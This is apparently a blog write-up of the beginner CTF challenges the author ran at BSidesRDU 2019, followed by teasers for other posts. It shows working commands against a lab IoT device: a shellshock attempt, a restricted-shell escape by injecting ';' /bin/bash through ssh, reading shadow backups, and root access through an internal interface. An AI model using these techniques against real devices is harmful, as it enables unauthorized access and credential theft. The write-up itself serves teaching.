2019 BSidesRDU - "Noobs Table" Experience and Challenge Write-Up

-
Welcome Thrillhouse Group attended BSidesRDU this year and instead of competing in the CTF, we contributed a stego challenge and also helped out at the "noobs table."  The idea of a noobs table has been kicked around for a little while now but this was the first time it was formally done at an EverSec CTF. Basically, there was a table in the CTF room reserved for people that are new to CTFs, and a couple of us were there to help with two sets of challenges created just for them. One was posted to the EverSec CTF challenges under the "newbs" category while teamWTG's contribution was a set of, effectively, offline challenges against an IoT device with extremely limited resources.

@uncue created the "newbs" challenges which included everything from service enumeration to lateral movement. Welcome Thrillhouse Group brought the "offline" set of challenges which included service enumeration, finding default credentials, password reuse attacks, a restricted shell escape, privilege escalation, and a few others flags hidden in files for pillaging.

The conference theme this year was "Security Dumpster Fire." With that in mind, Welcome Thrillhouse Group's set of challenges was, in-part, a recreation of an actual breach performed during a real dumpster fire of an external penetration test.

Milhouse Didn't Start the Fire.

Okay, let's get into it.

Service Enumeration

No flags were hidden in any banners. However, service enumeration is, generally speaking, the first step taken against a target in a netpen CTF. In the interest of time, and system stability, those who participated were told that SSH and HTTP were the only services they needed to investigate on this target.

# nmap -p 22,80 10.0.0.115

 Nmap scan report for 10.0.0.115
Host is up (0.0084s latency).

 PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: <REDACTED>

 Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds

Default Credentials

Reviewing the web server was suggested as a good first step. Browsing to the target on port 80 would redirect you to HTTPS and present you with a nondescript login page. However, the title of the page indicated what the device was. A simple Google search of the device with the terms "default password" appended to the end would return admin:admin as the credentials. Most didn't have to Google it, however, failing to do so could have cost them points as there is a second account. Both the admin account and the secondary account names were accepted as flags. In addition to using popular search engines, the accounts could have also been found via the user management section of the admin's web interface, or in a few config files once they had access to the target's file system.

Once the admin user was logged in, the players were presented with the first 1337 speak flag:

First Flag!

Players were then asked leading questions about the device to get them to review the web server in depth. Things like, "what interesting settings do you see" and "are there any other accounts configured?" The only other juicy finding in the web interface was an ldap-user configured and that a password was clearly defined for the account. Players were then directed to find the clear text password for that account and a password reuse attack was encouraged against the SSH service to do that.

Password Reuse

Connecting to the device via SSH as admin would present you with a highly customized restricted shell:

# ssh admin@10.0.0.115
admin@10.0.0.115's password:
restricted>

Various device configuration tasks could be completed in this shell, however, you could not read the password for the ldap-user account, nor could you perform any of the escapes found here: https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf

Restricted Shell Escape

In the interest of time, players were encouraged to try shellshock:

# ssh admin@10.0.0.115 -t "() { :; }; /bin/bash"
admin@10.0.0.115's password: 
sh: -c: line 0: syntax error near unexpected token `('
sh: -c: line 0: `/bin/restricted -p admin -c () { :; }; /bin/bash'
Connection to 10.0.0.115 closed.

We can see here that shellshock was having an effect given the "syntax error" messages. Now we can infer from these messages that the next step would be to terminate the command /bin/restricted -p admin -c and run another command.

Two ways to do that are with && or ;. Double ampersands requires the first command to run successfully before running the next command where as a semicolon simply separates commands.

So, now we can test this by replacing the shellshock attack with ; and running the id command:

# ssh admin@10.0.0.115 -t ';' id
admin@10.0.0.115's password: 
Unknown command: -c 
uid=1001(admin) gid=100(sshd)
Connection to 10.0.0.115 closed.

We can see in the output above, the id command ran successfully.
Now let's see if we can launch bash.

# ssh admin@10.0.0.115 -t ';' /bin/bash
admin@10.0.0.115's password: 
Unknown command: -c 
bash-3.2$ pwd
/var/home/admin
bash-3.2$ ls
adminflag.txt
bash-3.2$ cat adminflag.txt 
R3strictedSh3llz

Huzzah! At this point, pillaging was strongly encouraged. Though players were not root,  they would quickly find that being the admin user afforded them full access to almost everything on the box; including /etc/shadow. Nothing gets the heart pumping quite like a priv esc challenge though, so "rootflag.txt" was created so that only root could read it.  In order to find the path to root, chances are high that players would find some, if not all, of the "Pillage" flags.  So, let's quickly cover those next.

Pillage

When you are competing in a mixed/scenario style CTF, à la DerbyConCTF (RIP), it is wise to submit usernames, cracked passwords, and scour the box for flags in common locations such as .bash_history, /etc/passwd, config files, backup files, and databases. This important part of the process was exercised with the following planted flags:

ABri3fHistoryofFlags        # /var/home/admin/.bash_history
Alw4ysCh3cketcpasswd         # /data/etc_rw/passwd, not /etc/passwd
JuicyJuicyBackupFiles         # /data/etc_rw/shadow.bak
0hYeahD0mainUs3rCreds         # ldap username's creds, found in the product's database

Privilege Escalation

In order to perform the privilege escalation on the target the players needed to perform basic enumeration against the host. By the time we got to this point, players had already cracked root's password. Almost everybody tried to sudo or SSH in as root. However, the target does not have sudo installed and the root user is not allowed to SSH in!

This priv esc was dependent on checking which interfaces were configured on the device. This is a wise step to perform on any target you pwn because you never know which targets will serve you well as a pivot.

bash-3.2$ ifconfig
eth0      Link encap:Ethernet  HWaddr <redacted> 
          inet addr:10.0.0.115  Bcast:10.0.0.255  Mask:255.255.255.0
          inet6 addr: fe80:::fe0a:3ee0/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:219331 errors:0 dropped:12400 overruns:0 frame:0
          TX packets:67730 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:18418680 (17.5 MiB)  TX bytes:4337259 (4.1 MiB)
          Interrupt:40 Base address:0x8000 

 int0      Link encap:Ethernet  HWaddr <redacted> 
          inet addr:10.254.128.1  Bcast:10.254.128.255  Mask:255.255.255.0
          inet6 addr: fe80:::2dff:fef0:aba5/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:5 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 b)  TX bytes:390 (390.0 b)
<snip>

 Now that we have the IP address for a second interface, we can SSH to it as root and capture the last flag:

bash-3.2$ id
uid=1001(admin) gid=100(sshd)
bash-3.2$ cat /data/home/root/rootflag.txt 
cat: /data/home/root/rootflag.txt: Permission denied
bash-3.2$ ssh root@10.254.128.1            
root@10.254.128.1's password: 
# id
uid=0(root) gid=0(root)
# cat rootflag.txt 
sw33t9riv3scn00b

Conclusion

Though I started to lose my voice by midday, I believe that I personally helped about a dozen people nonetheless. My time at the noobs table was fulfilling and fun and I'd like to do it again sometime.

Thank you EverSec for allowing me to help out this year, thank you BSidesRDU for consistently running a great conference year after year, and thank you to all the n00bs who I got to work with this year. I hope to see you all as competitors at the next event!

Thanks for reading!
@strupo_

Find us on Twitter: @teamWTG

Popular posts from this blog

The Audacity of Some CTFs

-
Image
2021 Update : This is currently the most read post on our blog. Chances are that you are here because you are working on an audio challenge. If you see something looking like a digital signal, be sure to also check out our Radioactive Man write-up. I have stumbled across a few audio files while competing in CTFs over the last few years and I thought covering spectrograms would make a nice and quick blog post. Flags can manifest themselves in many ways when dealing with media files. One of the most common ways I have seen is by hiding them, or clues to find them, in the file's audio spectrogram. According to wikipedia: "a spectrogram is a visual representation of the spectrum of frequencies of sound, or other signals, as they vary with time." Basically, it is a method to visualize sound and signals. I first learned that you can embed hidden messages and images in a spectrogram when a friend showed me an image from an Aphex Twin song some years ago. Equation by
Read more

Code Name: Treehouse of Horror CTF

-
Image
A friend of mine asked me if I wanted to participate, on the sly, in an internal CTF that he put together for his employer. My score wouldn't be shown, and for all intents and purposes I did not compete. I figured I'd give it a code name incase I need to refer to this event. Let's call it the Treehouse of Horror CTF. The Treehouse of Horror CTF! The scoreboard appeared to be similar to the one used at the Defcon 26 IoT CTF, however this one was organized by challenge which made things nice for tracking your own progress versus one huge board of challenges.  I think this is called Jeopardy style. There were some odd moments at times because different challenge groups shared a target, so you had to identify which flag went with which challenge. Really not that big of a deal and I actually really enjoyed the format rather than just a single submit field like at derby or Eversec's CTF as it helped me track my progress with ease. The challenges were: FreePBX Re
Read more

2020 HTH CTF - Cloud Challenges

-
Image
Last weekend, @strupo_ joined team NiSec to participate in the HTH 2020 CTF  and together they got on the podium in third place! 2020 HTH CTF - Final Scoreboard The challenge categories included:  Cloud Crypto Forensics Kali 101  Misc Pwnables Recon Reverse Engineering Steganography Web Recently, strupo_ was fortunate enough to remotely attend  Breaching the Cloud Perimeter w/Beau Bullock . As cloud testing is still very new to him, and this blog tends to focus on introductory concepts and challenges, we thought it would be appropriate to try and tackle all of the cloud challenges in this post. Okay, let's get into it. The Cloud category had three challenges: BucketList (100) OhSnap! (150) Serving Less (250) BucketList Hey guys! I set up an AWS bucket for this year's hth that we can use to store our flags for the ctf. I think I made the bucket private but I'm not very good at this cloud stuff. Send me a message if I need to edit the permissions. Hint: Let's keep a flag
Read more